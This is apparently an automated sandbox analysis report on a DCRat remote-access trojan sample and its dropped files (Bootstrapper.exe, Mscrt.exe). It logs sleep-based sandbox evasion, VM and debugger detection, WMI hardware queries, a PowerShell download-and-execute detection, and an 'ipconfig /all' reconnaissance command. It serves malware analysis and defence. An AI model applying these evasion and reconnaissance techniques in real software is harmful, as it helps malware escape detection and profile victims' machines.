Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -597454s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -597329s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -597214s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -597094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -596983s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -596835s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -596716s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -596596s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -596219s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -596094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -595982s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -595860s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -595735s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -595594s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -595475s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -595357s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -595248s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -595125s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -595016s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -594907s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -594782s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -594667s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -594547s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -594438s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -594328s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -594214s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -594106s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -593994s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -593858s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -593603s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -593309s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -593141s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -593029s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -592907s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -592782s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -592672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -592555s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -592448s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -592341s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -592219s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -592094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -591981s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe TID: 7952	Thread sleep time: -591860s >= -30000s	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 7904	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 3300	Thread sleep time: -30000s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -23058430092136925s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -600000s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -599891s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -599781s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -599672s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -599562s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -599453s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -599344s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -599219s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -599109s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -599000s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -598891s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -598781s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -598672s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -598562s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 7828	Thread sleep time: -3600000s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -598450s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -598344s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -598234s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -598125s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -598016s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -597906s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -597797s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -597687s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -597578s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -597469s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -597344s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -597234s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -597125s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -597016s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -596906s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -596797s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -596687s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -596578s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -596469s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -596335s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -596207s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -596078s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -595969s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -595859s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -595750s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -595640s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -595531s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -595422s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -595312s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -595202s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -595094s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -594984s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -594875s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -594765s >= -30000s
Source: C:\ComponentReviewperfmonitor\Mscrt.exe TID: 5664	Thread sleep time: -594656s >= -30000s

Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\ComponentReviewperfmonitor\Mscrt.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\ComponentReviewperfmonitor\Mscrt.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed

Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00B1A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,		3_2_00B1A69B
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00B2C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,		3_2_00B2C220

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe

Code function: 3_2_00B2E6A3 VirtualQuery,GetSystemInfo,

3_2_00B2E6A3

Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 599770	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 599563	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 599286	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 598640	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 598421	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 598313	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 598198	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 598079	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 597688	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 597575	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 597454	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 597329	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 597214	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 597094	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 596983	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 596835	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 596716	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 596596	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 595982	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 595594	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 595475	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 595357	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 595248	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 595016	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 594907	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 594782	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 594667	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 594547	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 594438	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 594328	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 594214	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 594106	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 593994	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 593858	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 593603	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 593309	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 593141	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 593029	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 592907	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 592782	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 592672	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 592555	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 592448	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 592341	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 592219	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 592094	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 591981	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Thread delayed: delay time: 591860	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 30000
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 922337203685477
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 600000
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 599891
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 599781
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 599672
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 599562
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 599453
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 599344
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 599219
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 599109
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 599000
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 598891
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 598781
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 598672
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 598562
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 3600000
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 598450
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 598344
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 598234
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 598125
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 598016
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 597906
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 597797
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 597687
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 597578
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 597469
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 597344
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 597234
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 597125
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 597016
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 596906
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 596797
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 596687
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 596578
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 596469
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 596335
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 596207
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 596078
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 595969
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 595859
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 595750
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 595640
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 595531
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 595422
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 595312
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 595202
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 595094
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 594984
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 594875
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 594765
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Thread delayed: delay time: 594656

Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: DCRatBuild.exe, 00000003.00000003.1693721950.0000000000793000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000004.00000003.1734716017.0000000000926000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: wmdqEYgW2i.exe, 00000000.00000002.1691912606.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: Bootstrapper.exe, 00000001.00000002.2094313518.0000019018E12000.00000004.00000020.00020000.00000000.sdmp, Mscrt.exe, 00000014.00000002.2993134922.000000001AEA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe

API call chain: ExitProcess graph end node

graph_3-23599

Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe

Code function: 3_2_00B2F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_00B2F838

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe

Code function: 3_2_00B37DEE mov eax, dword ptr fs:[00000030h]

3_2_00B37DEE

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe

Code function: 3_2_00B3C030 GetProcessHeap,

3_2_00B3C030

Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00B2F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00B2F838
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00B2F9D5 SetUnhandledExceptionFilter,	3_2_00B2F9D5
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00B2FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00B2FBCA
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00B38EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00B38EBD

Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: Bootstrapper.exe PID: 7532, type: MEMORYSTR
Source: Yara match	File source: \Device\ConDrv, type: DROPPED

Source: C:\Users\user\Desktop\wmdqEYgW2i.exe	Process created: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe "C:\Users\user\AppData\Local\Temp\Bootstrapper.exe"	Jump to behavior
Source: C:\Users\user\Desktop\wmdqEYgW2i.exe	Process created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c ipconfig /all	Jump to behavior
